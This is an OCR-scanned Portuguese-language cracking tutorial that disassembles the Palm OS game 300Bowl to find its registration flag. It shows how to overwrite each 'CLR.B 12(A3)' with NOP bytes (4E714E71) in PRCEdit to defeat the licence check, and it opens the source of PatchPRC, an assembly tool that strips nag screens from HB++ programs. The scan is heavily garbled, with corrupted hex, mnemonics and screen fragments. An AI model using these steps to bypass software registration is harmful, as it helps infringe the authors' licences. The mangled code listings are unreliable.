A 1242) 
RS ou A2+12 


As 


D0O07?B?OZ %, ¿ODO7?BIGO 04 
HOVE.E 15 15 
20. BC a [ 3 Do oo 
D007E7TOE ED CLE. TI Dá4 DES 00 
DO00?BE?1O BE CLE.W DS 00 
DO0O7?BRLEZ LE SUBA.W e) 
0007B714 EE ELE. DO 
0007E7?16 a 49EDES9C LEX 1, 24 j 00 
DO007?E7IA Laza 4SEEFFDS LEA y 101) 
O007B7LE des 10312000 MOVE.E $30(21,D23, DO Do 
O007TETEZ H. EXT. DO ; Do 
B. 1D40FFAF MOVE.B DO, f-S81!/$-51/26) oo 
Old 3040 MOVE. W DO, 20 oo oo 
-H Dóds ¿DD DOdOFESS 1 DO 
E.. LEA 1, Az ) Do 
VE ¿DD O. TW 
A CMHPI.1 $11!/$B, D2 
0007E736 o. ELE $-26!13-1A ¿ODOP?E7?LE . 
0007B7 t. MOVEO Fil, DZ 5 
0007B7 2. 3203 MOVE. 1 D3, Dl 00 
0007B7F3C A..: 06410094 ¿DDI.W fl43!/794, Dl 00 
0007BE740 [oO 43GEEFFDS LEA ), AL 00 
0 [| ar 8 CA Dd: A3 | aa TT Aa5 | O YA PC ] En 
AÑ M4 n> n3 na NA DA nz SD 00 


oo 00 00 00 
00 00 00 00 
0000-00 Ol. 30 comi eno 


oo 00 00 00 


[0007B5B4-0007BS 
o [_JHTEARPuUmTOS 


ODO7B 


Ainda analisando o código verificamos logo abaixo a 178. 
“coloque 1 no byte enderecado por A3+12”. 


abaixo), 


Notamos que, 
palavras, 


00000b04 
00000b0a 
00000b0c 
00000b0e 
00000b12 
00000b14 
00000b18 
00000ble 
00000b20 
00000b24 
00000b2a 
00000b2c 
00000b30 
00000b36 
00000b38 
00000b3c 
00000b42 
00000b44 
00000b48 
00000b4e 
00000550 
00000b54 
00000b58 
00000b5a 
00000b60 
00000b64 
00000bó6a 
00000b6c 
00000b70 


ou seja, 


177c0001000c 
dal4 

6766 
0c530033 
6704 
422b000c 
0c6b00390002 
6704 
422b000c 
0c6b00340004 
6704 
422b000c 
0c6b00360006 
6704 
422b000c 
0c6b00300008 
6704 
422b000c 
0c6b0038000a 
6704 
422b000c 
4a2b000c 
67la 
167c0001c90e 
206de9a4 
a1lfc00000056 
4e90 
6100fe70 
60000250 


no resto do código, 
Oo programa coloca 1 em A3+12 e depois caso algum teste falhe, 


D3 
Mr E:Arqui... 


L78 


L79 


L80 


L81 


L82 


L83 


L84 


(5) 30080w,... =* Palm OS... 


Fig. 


temos vários CLR.B 12(A3) que seráo executados caso alguma condigáo seja ou náo satisfeita. 
ele zera o byte limpando-o com o CLR.B 12(A3). 


MOVE.B $1,12(A3) 
TST.B (A) 

BEQ L85 

CMPI .W $51!$33, (A3) 
BEO L79 

CLR.B 12(A3) 

CMPI .W $+57!1$39,2(A3) 
BEOQ L80 

CLR.B 12(A3) 

CMP1.W $52!$34,4(A3) 
BEOQO L81 

CLR.B 12(A3) 

CMPI .W $54!$36,6(A3) 
BEOQO L82 

CLR.B 12(A3) 

CMPI .W $+48!$30,8(A3) 
BEOQO L83 

CLR.B 12(A3) 

CMPI .W $+56!$38,10(A3) 
BEQO 184 


CLR.B 12(A3) 
TST.B 12(A3) 


BEQ L85 

MOVE .B +1,-14066(A5) 
MOVEA.L -5724(A5),A0 
ADDA.L +86!556,A0 
JSR (A0) 

BSR L67 

BRA L95 


£5 southDe... promo E € 29E) 23:44 


Nessa linha encontramos a instrucáo MOVE.B +1,12(A3) (vide fig. 12 e código 


00000b74 
00000b7a 
00000b7c 
00000b7e 
00000b80 
00000b82 
00000b84 
00000b88 
00000b8c 
00000b90 
00000b92 
00000b96 
00000b98 
00000b9%a 
00000b9e 
00000ba0 
00000ba4 
00000ba6 
00000bas8 
00000baa 
00000bae 
00000bb2 
00000bb6 
00000bb8 
00000bbc 
00000bbe 
00000bco 
00000bc4 
00000bc6 
00000bca 
00000bce 
00000bce 
00000bd2 
00000bd6 
00000bda 
00000bdec 
00000be0 
00000be2 
00000be4 
00000bes8 
00000bea 
00000bee 
00000bfO 
00000bf2 
00000bf6 
00000bfa 
00000bfce 
00000c00 
00000c02 
00000c04 
00000c06 
00000c08 
00000c0a 
00000c0c 
00000c0e 


177c0001000c 
4243 
4244 
4245 
95ca 
4242 
49ede99c 
43eeffd8 
10312000 
4880 
1d40ffaf 
3040 
d648 
45f28000 
5642 
0c42000b 
6fe6 
7401 
3203 
06410094 
43eeffd8 
10312000 
4880 
1d40ffaf 
3040 
d848 
45f28000 
5642 
0c42000b 
6fe6 
7402 
064400e7 
43eeffd8 
10312000 
4880 
1d40ffaf 
3040 
da48 
45f28000 
5642 
0c42000b 
6fe6 
3601 
064500b5 
45ea0lbc 
3003 
cl1fc147b 
4240 
4840 
3200 
e641 
3003 
740f£ 
e460 
9240 


L85 


L86 


L87 


L88 


MOVE.B $1,12(A3) 
CLR.W D3 

CLR.W D4 

CLR.W D5 

SUBA. L A2,A2 

CLR.W D2 

EA -5732(A5),A%s 

EA -40(A6),A1l 

MOVE .B 0(A1,D2.W),DO 
EXT.W DO 

MOVE.B DO,-81(A6) 
MOVEA .W DO,A0 
ADD.W A0,D3 

LEA 0(A2,A0.W),A2 
ADDO.W $3,D2 
CMP1I.W +11!$b,D2 
BLE L86 

MOVEQ +1,D2 

MOVE .W D3,D1 
ADDI.W $148!$94,D1 
LEA -40(A6),A1l 

MOVE .B 0(A1,D2.W),DO 
EXT.W DO 

MOVE.B DO,-81(A6) 
MOVEA .W DO,A0 
ADD.W A0,D4 

LEA 0(A2,A0.W),A2 
ADDO.W $3,D2 
CMP1I.W $11!$b,D2 
BLE 187 

MOVEQ +2,D2 

ADDI.W $231!$e7,D4 
LEA -40(A6),A1l 

MOVE.B 0(A1,D2.0W),DO 
EXT.W DO 

MOVE .B DO,-81(A6) 
MOVEA .W DO,A0 
ADD.W AO,D5 

LEA 0(A2,A0.W),A2 
ADDO.W $3,D2 
CMP1I.W +11!$b,D2 
BLE L88 

MOVE .W D1,D3 
ADDI.W $+181!$b5,D5 
LEA 444(A2),A2 

MOVE .W D3,DO 
MULS.W $5243!$147b,DO 
CLR.W DO 

SWAP DO 

MOVE .W DO,D1 

ASR.W +3,D1 

MOVE .W D3,DO 

MOVEQ +15,D2 

ASR.W D2,DO 

SUB.W DO,D1 


00000c10 
00000c14 
00000c16 
00000c18 
00000cla 
00000cle 
00000c20 
00000c22 
00000c24 
00000c26 
00000c28 
00000c2a 
00000c2c 
00000c30 
00000c34 
00000c38 
00000c3a 
00000c3c 
00000c3e 
00000c40 
00000c44 
00000c46 
00000cl4a 
00000c4c 
00000c4e 
00000c50 
00000c52 
00000c54 
00000c56 
00000c58 
00000c5a 
00000c5e 
00000c60 
00000c62 
00000c64 
00000c66 
00000cóa 
00000c6c 
00000c6e 
00000c70 
00000c72 
00000c74 
00000c76 
00000c78 
00000c7ce 
00000c80 
00000c84 
00000c86 
00000c88 
00000c8c 
00000c8e 
00000c92 
00000c94 
00000c98 
00000c%a 


c3f 
964 
320 
300 
eE 
424 
484 
es4 
el6 
904 
304 
2f0 
486 
4e4 
102 
488 
508 
b05 
670 


c0064 
1 
3 
dl 
c6667 
0 


oOoprroo 


8 
effaf 
fa0c9 
effaf 
0 
E 
3 
4 


422b000c 


300 
enla 
424 
484 
320 
e64 
300 
740 
el6 
924 
est 
304 
90c 
320 
300 
¡cilaa 
424 
484 
es4 
el6 
904 
304 
2f0 
486 
des 
102 
488 
508 


4 
c147b 
0 
0 
0 
1 
4 
f 
0 
0 
c0064 
4 
1 
8 
1 
c6667 
0 
0 
0 
1 
ab 
0 
8 
effaf 
fa0c9 
effaf 
0 
f 


b06b0002 


670 


4 


422b000c 


300 
crf 
424 
484 


5 
c147b 
0 
0 


L89 


L90 


MULS.W $+100!$564,D1 
SUB.W D1,D3 


MOVE .W D3,D1 

MOVE .W D1,D0 

MULS.W $26215!56667,D0 
CLR.W DO 

SWAP DO 


ASR.W $2,DO 
ASR.W D2,D1 
SUB.W D1,DO 


MOVEA .W DO,A0O 

MOVE .L AO, -(A7) 

PEA -81 (A6) 

TRAP +$15,$A0C9 = sysTrapStrIToA 
MOVE .B -81 (A6),DO 
EXT.W DO 

ADDO.L +8,A7 

CMP.W (A3),DO 

BEQ L89 

CLR.B 12(A3) 

MOVE .W D4,D0O 

MULS.W $$5243!$147b,D0 
CLR.W DO 

SWAP DO 

MOVE .Ww DO,D1 

ASR.W +$3,D1 

MOVE .W D4,D0O 

MOVEQ +15,D2 

ASR.W D2,DO 

SUB.W DO,D1 

MULS.W +100!564,D1 
MOVEA .W D4,A0 

SUBA. W D1,A0 

MOVE .W AO,D1 

MOVE .W D1,DO 

MULS.W $26215!$6667,DO 
CLR.W DO 

SWAP DO 


ASR.W +2,DO 
ASR.W D2,D1 
SUB.W D1,DO 


MOVEA .W DO,A0O 

MOVE.L AO, -(A7) 

PEA -81 (A6) 

TRAP  +$15,$A0C9 = sysTrapStrIToA 
MOVE .B -81 (A6),DO 
EXT.W DO 

ADDO.L +8,A7 

CMP.W 2(A3),DO 

BEQ L90 

CLR.B 12(A3) 

MOVE .W D5,DO 

MULS.W $5243!$147b,D0 
CLR.W DO 

SWAP DO 


00000c9c 
00000c9%e 
00000ca0 
00000ca2 
00000ca4 
00000ca6 
00000ca8 
00000cac 
00000cae 
00000cb0 
00000cb2 
00000cb4 
00000cb8 
00000cba 
00000cbce 
00000cbe 
00000cco 
00000cc2 
00000cc4 
00000ccó 
00000cca 
00000cce 
00000cd2 
00000cd4 
00000cd6 
00000cda 
00000cde 
00000ce0 
00000ce2 
00000ce8 
00000cec 
00000cee 
00000cfO 
00000cf2 
00000cf4 
00000cf8 
00000cfa 
00000cfce 
00000cfe 
00000d02 
00000d04 
00000d06 
00000d08 
00000d0a 
00000d0c 
00000d0e 
00000d10 
00000d12 
00000d16 
00000dla 
00000dle 
00000ad20 
00000d22 
00000d26 
00000d28 


3200 
e641 
3005 
740f£ 
e460 
9240 
c3fc0064 
3045 
90c1 
3208 
3001 
c1fc6667 
4240 
4840 

es4 
el6 
904 
304 
2f08 
486effaf 
ldelfa0co9 
102effaf 
4880 

508f 
b06b0004 
6704 
422b000c 
2054 
alfco000106c 
48780064 
2f0a 

4e90 

508f 

3200 
c3fc0064 
94c1 

320a 

3001 
c1fc6667 
4240 

4840 

e140 

740f£ 

e461 

9041 

3040 

2f08 
486effaf 
delfa0c9 
102effaf 
4880 

508f 
b06b0006 
6704 
422b000c 


0 
1 
1 
0 


L91 


MOVE .W DO,D1 
ASR.W +3,D1 
MOVE .W D5,D0O 


MOVEO +15,D2 
ASR.W D2,D0 
SUB.W DO,D1 


MULS.W +100!$64,D1 
MOVEA.W D5,A0 

SUBA. W D1,A0 

MOVE .W A0,D1 

MOVE .W D1,DO 

MULS.W $26215!$6667,D0O 
CLR.W DO 

SWAP DO 


ASR.W *2,DO 
ASR.W D2,D1 
SUB.W D1,DO 


MOVEA .W DO,A0O 

MOVE .L A0,-(A7) 

PEA -81 (A6) 

TRAP +$15,$A0C9 = sysTrapStrIToA 
MOVE .B -81 (A6),DO 
EXT.W DO 

ADDO.L 4+8,A7 

CMP.W 4(A3),DO 

BEO L91 

CLR.B 12(A3) 

MOVEA.L (A4) ,A0 

ADDA.L $+4204!$106c,A0 
PEA $0064.wW 

MOVE.L A2,-(A7) 

JSR (A0) 

ADDO.L +8,A7 

MOVE .W DO,D1 

MULS.W $+100!564,D1 
SUBA. W D1,A2 

MOVE .W A2,D1 

MOVE .W D1,D0O 

MULS.W $26215!$6667,D0 
CLR.W DO 


SWAP DO 
ASR.W +2,D0O 


MOVEO +15,D2 

ASR.W D2,D1 

SUB.W D1,DO 

MOVEA .W DO,A0O 
MOVE.L AO, -(A7) 
PEA -81 (A6) 

TRAP +$15,$A0C9 = sysTrapStrIToA 
MOVE.B -81 (A6),DO 
EXT.W DO 

ADDQO.L $+8,A7 
CMP.W 6(A3),D0O 

BEQ L92 


CLR.B 12(A3) 


00000d2c 
00000d2e 
00000d32 
00000d34 
00000d38 
00000d3a 
00000d3c 
00000d3e 
00000440 
00000442 
00000444 
00000446 
00000448 
00000d4c 
00000d4e 
00000d50 
00000d52 
00000d56 
00000d58 
00000d5a 
00000d5c 
00000d5e 
00000d60 
00000462 
00000d64 
00000d68 
00000d6c 
00000470 
00000472 
00000d74 
00000478 
00000d7a 
00000d7e 
00000d80 
00000d84 
00000d86 
00000d88 
00000d8a 
00000d8c 
00000d8e 
00000490 
00000492 
00000494 
00000d98 
00000d9%a 
00000d9c 
00000d9e 
00000da2 
00000da4 
00000da6 
00000das8 
00000daa 
00000dac 
00000dae 
00000db0 


5144 
0645ffd6 
3004 
clfc147b 
4240 
4840 
3200 
e641 
3004 
740f£ 
e460 
9240 
c3fc0064 
9841 
3204 
3001 
c1fc6667 
4240 
484 
es4 
el6 
904 
304 
2f08 
486effaf 
ldelfa0co9 
102effaf 
4880 
508f 
b06b0008 
6704 
422b000c 
3005 
cl1fc147b 
4240 
4840 
3200 
e641 
3005 
740f£ 
e460 
9240 
c3fc0064 
9a41 
3205 
3001 
c1fc6667 
4240 
4840 
e140 
e461 
9041 
3040 
2f08 
486effaf 


oOoprrRoo 


L92 


L93 


SUBO .W +8,D4 


ADDI.W $-42!-$2a,D5 
MOVE .W D4,D0 

MULS.W $45243!$147b,DO0 
CLR.W DO 

SWAP DO 

MOVE .W DO,D1 

ASR.W +3,D1 

MOVE .W D4,D0 

MOVEQ +15,D2 

ASR.W D2,D0 

SUB.W DO,D1 

MULS.W $+100!$564,D1 
SUB.W D1,D4 

MOVE .W D4,D1 

MOVE .W D1,D0 

MULS.W $26215!56667,D0 
CLR.W DO 

SWAP DO 


ASR.W 42,DO 
ASR.W D2,D1 
SUB.W D1,DO 


MOVEA .W DO,A0O 

MOVE.L AO, -(A7) 

PEA -81 (A6) 

TRAP +$15,$A0C9 = sysTrapStrIToA 
MOVE .B -81 (A6),DO 
EXT.W DO 

ADDO.L 4+8,A7 

CMP.W 8(A3),D0O 

BEQ L93 

CLR.B 12(A3) 

MOVE .W D5,DO 

MULS.W $$5243!$147b,D0 
CLR.W DO 

SWAP DO 

MOVE .Ww DO,D1 

ASR.W $3,D1 

MOVE .W D5,DO 

MOVEQ +15,D2 

ASR.W D2,DO 

SUB.W DO,D1 

MULS.W $+100!564,D1 
SUB.W D1,D5 

MOVE .Ww D5,D1 

MOVE .W D1,D0O 

MULS.W $26215!$6667,DO 
CLR.W DO 

SWAP DO 


ASR.W 2,DO 
ASR.W D2,D1 
SUB.W D1,DO 


MOVEA.W DO,AO 
MOVE.L AO, -(A7) 
PEA  -81(A6) 


00000db4 4e4fa0c9 TRAP.— +15,$A0C9 = sysTrapStrIToA 
00000db8 102effaf MOVE .B -81 (A6),DO 

00000dbc 4880 EXT.W DO 

00000dbe 508f ADDO.L +8,A7 

00000dc0 b06b000a CMP.W 10(A3),D0 

00000dc4 6704 BEO L94 

00000dc6 422b000c CLR.B 12(A3) 

00000dca 6100fc12 L94 BSR L67 

00000dce 4ceelc38ff94 L95 MOVEM. L -108(A6),D3-D5/A2-Al 
00000dd4 de5e UNLK A6 

00000dd6 4e75 RTS 


'* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


a 
| | | memory dump 


J 


DA | 


¡| disassembler 


CN E 


address | ascii he 
DOO?D4DO Sa... 35400004 MOVE . 
0007D4D4 Me: ¿D6DESAO MOVEA. 
DO00?D4Ds ' D1FCOOO... ¿DEAL 
DO007D4DE Y. JSR 
OOD?D4EO Dina 4A2A000C  TST.B._¿ 
DO007D4E4 g- 671E BEO F3O0IF$1E ¿O007DSO 
O007D4E6 Pe 3F3CO3EA MOVE . $l002!$3EA, 
DDO7?DA EA JO. 4E4F2A192 TRAP $lIS!IFF, $4l: 
ODO7?D4EE PE 3F3CO: MOVE. W F1000!73E8S 
O007?D4FZ JO... 4E4FA19E TRAP $15!5$F, 
0007D4FÉ6 A..t 41EDFE74 LEA H-1164!17-4 
O007D4FA 7 MOVE.B $$l, $120) 
0007DSO0 la EDDO0FF34 BRA $-204!17-CC ¿O007D436 
DO0O07?DSO04 FL... 3F3COS3EB MOVE. $100: SEE (a) oo 0 
O0O07?DSOS se 4E4FA192 TEAP F1IS!FF, f41: IFAl92z [=y= 01 00 00 DO al 
DOO0O?DSOc E E6ODOOFFZS EPA £-216!'$-D8 ;0007D436 oo 00 00 o 00 00 00 00 00 o 00 00 
oO00?DS10 El 4240 CLR.W DO í 
o007Ds12 3 3 MOVEM.L  f-104!$-681(26) 
o0007?DS5183 Jo 4E5E UNLE m6 es 2. Ñ o OO IIDBE 23 20 30 20 47 86F 77 60 ... N. 2300 Bortwl 
O007DS1A Nu 4E75 ETS 
0007?DS1c Tu. LINE 
D007?DS20 --3 45E71 MOVEM. L 
0007D524 Hs 45EDE3240 LEA 


hi 


35 00 36 


01 31 00 


15 5 5 00 15 00 


00 oo 00 00 00 00 


00 éc 00 00 00 01 00 DO cm 


CU E 


co 00 ¡0 00 


oo oo 00 00 00 00 00 o 00 00 


EN yA De hi yA pd en ye 4d da A 12 (A2) ou 


oo oo 00 00 00 00 00 o 00 pe A2+12 


MU cu JS a EN 


00 oo 00 00 00 00 00 oo 00 00 


00 00 00 00 00 00 00 o 00 01 


00 00 00 00 oo 00 00 


Registration... 


DUD TID4EO 432 $ 
3 Iniciar O oa 


E 300Bo0w... =- Palm OS... Prcedit £2 southDe... ME couthDe.... PT 8 4) 2050 23:54 


Fig. 13 


Ao terminar de executar a subrotina, o southDebugger volta a linha seguinte a chamada daquela subrotina e nos chama a atencáo o teste 
feito. 


É executada a seguinte instrucáo: TST.B +12!$C(A2) conforme a fig. 13. 


Podemos observar na Janela Memory dump do southDebugger que o byte 12(A2) é zero! 
Concluímos que, ao digitar um código inválido, algum daqueles CLR.B 12(A3) foi executado. 


O byte enderecado por A2+12 ou A3+12 é o flag que indica se o registro é válido ou náo. 
Para patchear o programa, basta NÁO deixarmos que o byte seja zerado. Pra isso devemos substituir TODOS os CLR.B 12(A3) por NOP. 


ESO) a ' instrugáo CIR. B 12 (43) ocupa Ei bytes eo NOD ocupa 2 bytes devemos colocar NOP duas vezes. 


Pe File Edil el Tools  Winda Help 


30080HighColor patched pre | ACP | code0001.s code0002s | code0003.s | coded00s : | 


ODOOD000O.  4eStfeac LINE 26, H$-340 A 
00000004. 48e71£38 MOVEM.L D3-D7/A2-24 (47) 2 
0o000000s. — 3£3c0005 MOVE .W  $S5,-(47) 

DODODOOe  246de2a4 MOVEA.L -5724(45),A2 

00000010. Asfeoooooero ADDA.L $3312!'9$cf0,22 

00000016  4e92 JSR (12) 

00000018. 3£3c0005 MOVE .W  $S,-(47) 


- EE Resources 
Ey Forms 
O-£3 Alerts 

++ 1000 Direct Color 

++ 1001 Unable to run prograr 

++ 1002 Registered 

+ 1003 Not Registered 

-] £3 References 

s 000006 
1004 Cant run 300 Bowl 
1005 Quick Help 


A Find or replace text (42) 
ooo0ooo ) H15,$142E9 = sysTrapSysTicksPerseco) 


0000004 Texttofind: ¡EPA | PV $1,DO 
000000 Wo DO,- (247) 


+ 

2 

+ 1006 Post pour High Score DODODOSR Testto insert +] (421 
+ 1007 Game ln Progress pooooo ! Y D2 

+ 1008 Install HiColor ersior 14 000000] | Oeeration: z. 
2 
4 
+ 
+ 
a 


O O A 


- -. 


op 
0 ra 


-329 1-8 1? 
AP Direction: 4-3241-9144,D7 


000000 " aia -20146),A43 


L 
1009 Install 256 Color Vers 15 000000 (* Search only (Search and replace .L A6,D7 
1010 Install Grey16 Wersior 18 DODOOOP no  H.L 
> 


1011 Install Greyd Yersion 1 p 
049 y a Case sensitive E 

1012 Device Not Supporte is 000000 so 5 -13714(45),40 

Pp ll 

1013 Memory Card 19 000000] f Whole words only E Backward .L  A0,-328(26) 

DoDooDo 

DoODooO 

22 OODODO 


lonore nor-spacing characters -3736(15),A40 
.L 240,-340(26) 
-4274 (45),240 
Kepworde 23 0oODo000 .L 40,-332 (251. 
a E Changes 24 poDo00o -13978 (AS), ¿0 


n e PHN AAA AAA AA , . $ PA == 


a 


Space compressi 


a 

w 

at 
morra 
mo 


E-4-E-E 


AL dede 2-4-4-0-0-4-0-E-E 


r 
r 

Regular expression 
T” Pr E 


oo pl pl y -139 


145),40 


mm] 
e 
» 
E 
O 

I 

Q 
Q 
las 
po 
di 


Scope: Origirr: 
(+ Global Call Ste Views (e From cursor 


oO 
[ua] 
[mn] 
1 
1 
mn] 
lo: 
E? 
La] 
” 
to 
p 


CO From home position 


| 
IS 
tos 
S= 
o 
» 
" 
a 
Ú 


0/40,241.Lj 
$1,D2 
$151/$97,D2 
L1 

CLR.VW D4 

MOVE.L  143,D6 
L2 CLR.WV DZ 
3904 MOVE. D4,DO 
c1fcO025 MULS.W  F40!5$28,DO 

3092 L3 MOVEA.W D2,A0 

33 poD0o00o07a dica ADDA.L 240,40 v 


DOO 


4 D00 


000 
000 


| 


Ln 1, Col 1 | 
¡3 Iniciar AO M% Exjarqui... E] 30080... PalmoOsS... 2 Preedit £7 southDe... | “"southDe... PT omovom E 40 2058 23:56 


Fig. 14 


No PRCEdit procuramos pelos bytes da instrucáo CLR.B 12(A3) conforme a fig. 14. 
Os bytes sáo 422b000c. 


Preedit - [code0002.s] 
Edit View 


Window Help - 0X 


3008 ow!lHighLo or.patched. pro | RCP | code0001.: codeD0D2 s codebÚ codeD004 < 


147c0044ff dp MOVE.B  Ff65!5$4494,- 

1M45ffdc MOVE.B 69545, 

1d7c0046ffdd MOVE.B  f70!/9$46,-3 

422effde CLR.B -34 116) 

2606 MOVEO H6,D3 

3403 L76 MOVE.W  D3,D2 

042000 CMP1I.W  f11'5$b,D2 

6e12 BGT 78 

eeffds LEA -40(A6 

pcon4: L77 HOVE.B  $66!$ 
y ADDO.W  f1,D2 

2000 CMP1I.W  f11!'5$b,D2 

BLE aa 

CO001000c L78 MOVE.B  H$1,12(43) E 

TST.B (14) 

66 BEO Las 

OcsS30033 CMPI.W $51!$33, (43) 


Ye Resources 
E | Forms 
2) dlerts 


++ 1000 Direct Color 


+ 1001 Unable to run prograr 
+ + 1002 Registered 
[ 4 


1003 Not Registered 


aj 


AO 


y, A0 


92,0(20,D2.1W) 


baa 
1004 Cant run 300 Bons! 
1005 Quick Help 

1006 Post pour High Score 
1007 Game In Progr 
1008 Install HiColor', 
1009 Install 256 Color" 
1010 Install Grey16 Wersio 
1011 Install Grey4 
1012 Device Not Supporte 
+) + 1013 Memory Card 

Y Strinos 

23 Data 0 

Y deb 

2 Keywords 
23 Changes 


nn Roa 
Nota Rom 


y 
(q o 


0 
Hh 
+ 
[5 


Dn] 

rr H 
3 mM 
a 


to 


O 
JH 


o00 
DDD 


3H 


L 

a 

o J 
+. 
hop 
A 

MS 


pa 
a 
las 
--] 
las 
as 


Ob0e 
3 00000b12 6704 BEO L79 
1 0000014 CLR.B— 12(43) 
2 215 Ocó6pb00390002 L79 CMPI.W  F457!1539,2 (143) 
Oble 6704 BEG 
422b000c CLR.B 
Oc 6900340004 LSO CMP1I.V0 
6704 BEG 


E 
9 444 4 4 4 4 4 


4 DDD 


ODO 
00000 


+ 4 +) + 


3 DODO 


ono0o0o0bza 


DODODbE ce 


3 DODOOBSO 


99 OODOOPS6 


MA 


0000042 
0000044 


DODOOb4e 
DODoDOBSO 


7 DODOO0ps4 


 DODOObBSs 


2 OD0O000bSa 


3 DODODOpBé6O 


Ll Iniciar 


Ln 831, Col 20 


fr E:|Arqui... 


15 mostra quando o PRCEdit encontra a string. 


($ 30080w... 


1c9ne 
4 


00056 


—— PalmoOS... ¿¿ Preedit 


Fig. 15 


BEG 
CLR.BE 
CMPI.V 
BEO 
CLR.B 
CMPI.V 
BEO 
CLR.B 
CMPI.V 
BEO 
CLR.B 
TST.B 
BEO 
MOVE.B 


MOVEA.L 


ADDA.L 


EJ southDe... 


+ 
in ta 


o 
Co 


E] 


A el 


'* SouthDe... 


8 4)2 208 23:57 


MM 4E71 (NOP) 04D: 
7000 (MoveQ 40, DO) 
7001 (MoveQ) 41,D0) 


103C0001 (Move,B 41, DO) 


MODE Post pour High Score 
1007 Game In Progre 
1008 Install HiColor + 


9% 4.1... 4 


1013 Memory Card 


+ 


+) [+]-[+)-E 


23 Search Results 


¿200 
6066 
2EFF 


3000 


6844 
0D67 
9060 


: A742 
. s1/ «a 


1549 
3120 
0O1FF 
19652 
0600 
41FF 


7200 


EFE 
2 LE 


coc 
600 
442 
C4A 
4D1 
ETA 
249 
OFF 
EbF 
120 
056 
EEFF 


aña 


006000 204 


A] 


Ci) 300Bowi... 


DD42 2 


442 2 


4609 
OC 3B 
F424 
D13F 
3042 
FCO3D 
6DF 1 


6BDO 
D6b6 
2B00 
2B0 

FC0D 
7en0 
EDES 
2aF30 
E674 
0048 
4200 
pDa10 
FPoa2n 


383B 
¿CEF 
BEFF 
3800 


¿Cobo 


2 A7TAE 
0D4A 
0106 


Do00 


DB6F 
7en0 
DB1D 
DET6 
BC 
o1 
Dc 
34 
04 
Dc 
DC6 
000 
10 


O < RQe OOO Oo 


904 


40D 
013 
a2D01D 
4200 
3120 


ANEA 


Resource: code.00 


=/ Palm OS... 


SowlHiahEolor. patched. pro | RCP | code0001.s | codeMD2. 


1409 


SE4E 
6DF 1 
4FA2 
FE1F 
3042 
AC4B 
2B00 
24D1 


3900 
0106 
4352 
4300 
D91D 
45FF 


300 


1467 
3900 
0442 
pene 
3800 
7eo0o 
9061 
4342 
DsaiD 
F250 
4100 
aF 30 
E674 
38010 


a2nA 


Fig. 


3Anc 
¿200 
754E 
6B3F 
D44E 
3000 


7700 


E71C 
OC67 
FCo0 
EEFF 
4342 
4241 


OFF 


424A 3 


016E 
coo 
DC1D 
4200 


42080 


6600 
0267 
2B00 
6BD0 
0267 
109 
DFE 
442 
120 
056 
443 
0D8 
206 
DFF 
NREAR 


O Aa 'O O QU Y O 


Ama ( 


Prcedit 


16 


Preedit - [E:Wrquivos de ProgramasiStanleyPalmiCrackiPRCsi300BowlHighColor.patched. pre] 


BADO 
1409 
Sé6bD0o 
3000 
SE4E 
0145 
4D4E 
3847 
1544 


000 
EO2F 
424F 
EEFE 
1962 
BFOC 


J Hat 

¡80 A 

H Pm) 
011100 


(Ma O 
ra Dd 
6 ad PO aca A a al 


[mun] 
a 


ou ( 


IO OD a 
MA O 


a 


a 
ESC 
ao 


Ha 
PA 
[an] 
ld 


4400 
2F30 
FEAR 


2 4200 


z | codeb004 | 


0301 
o001F 
0142 
754E 
BEFF 
4FA2 
EDF 1 
2DC9 
564E 
0442 
EF DO 
Ds12 
0806 


000 


0067 


7200 


Da1D 


4BFF 
1241 
DOBBF 
3367 
2BD0 
BBOO 
056 
2BD0 
BDES 
0002 
CA42 


201D 


pDsi10 


5 F280 
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Agora, teclamos F9 e digitamos 4E71 duas vezes (4E714E71) ou clicamos no menu Insert -> 4E71 (NOP) duas vezes. 
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ource; code, 0002 


Fig. 17 
A fig. 17 mostra os bytes alterados. 


Depois de alterados, teclamos novamente F9. O PRCEdit volta a mostrar o código (vide fig. 15) e entáo teclamos F3 “find next”. Ao 
encontrar a próxima ocorréncia, teclamos novamente F9 e alteramos os bytes, e assim por diante. 


Devemos fazer isso até que nenhuma outra ocorréncia seja encontrada. 
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Fig. 18 


A fig. 18 mostra os vários bytes a serem alterados. 
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+) 23 Forms 2 code0002.000 C 4E714E71 
7] Alerts 3 code ¿DOOODBZ0 C 4E714E71 
5 + 1000 Direct Color 4 code 000 C 4E714E71 
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+ 1004 Cant run 300 Bowl epi 
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1009 Install 256 Color *, 
1010 Install Grey16 
1011 Install Greyd ers 
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CJ DataD 

CJ de 
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Fig. 19 


Depois de alterados, clique em File -> Save, o PRCEdit mostra todas as alteracóes conforme a fig. 19. 


Faca o HotSync do 300Bowl.patched e execute. 


Podemos notar que a opcáo Register náo aparece mais no menu do programa (fig. 20). 
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()Serial ()HotSync/Code ()Trial ()Multiprotección ()Encriptado (X)Otro 
Em assembly, quase náo há demora no processo. 


Programa para patchear aplicativos compilados com o HB++ versáo 1.05.973.1309 
X)NewBies )JIntermedio ()Avanzado ()Master ( )Gúru 
SouthDebugger, PRCedit, PilotDis. Palm Real ó Pose emulador, UltraEdit-32, PalmDemon 0.27 ¡PalmDebugger 


Nubila [recna: — v/06/Agosto/2006 


INTRODUCCION 


PatchPRC.ASM 


Programa para patchear aplicativos compilados com o HB++ versáo 1.05.973.1309 


Nota: O programa escrito em Visual Basic para paichear os .PRC compilados com o HB++ é muito lento para arquivos grandes. 
Por isso, escrevi esse programa em Assembly 80x86 para patchear .PRCs compilados com o HB++. 

Em assembly, quase náo há demora no processo. 

Afer Ventus 


Brasil 
post_nubila(Wyahoo.com.br 


AL ATAQUE 


PatchPRC - Retira a nag screen de programas compilados com HB++ versáo 1.05 náo registrada 


Digite PatchPRC /? para comentários. 


Criado por: 

Afer Ventus 

Brasi | / 2006 

Criptografia - SIM(simples - 8 bits / após rodar PatchPRC. COM pel a 12 vez) 
Aj uda - SIM (/?) 


Checa sistema - Náo 


; Residente - Náo 
; Obs.: Este programa foi criado usando o EMJ8086 que náo exige as di retivas do assembl y. 

; Para compilar esse programa usando o TASM retire os ";" do ¡nício das linhas abai xo e conpile coma si ntaxe: 
TASM Pat chPRC / m3 

TLI NK PatchPRC / x/t 


wW5g9 db ' Copyright (c) 1998 - PatchPRC! V1.00', Odh, Oah 
db 'Afer Ventus p Brasil 
db Odh, Oah, Odh, Oah, 24h, lah 


. 286 ¡; <=retire os 
. model tiny ; <= conentários 
. code ; <= dessas linhas 
; j Urmps ; <= para compilar usando o TASM 
org 100h E 
start: ; 
jnp next ; 
next: ; 
lea si,[progranm ¿SI = programa 
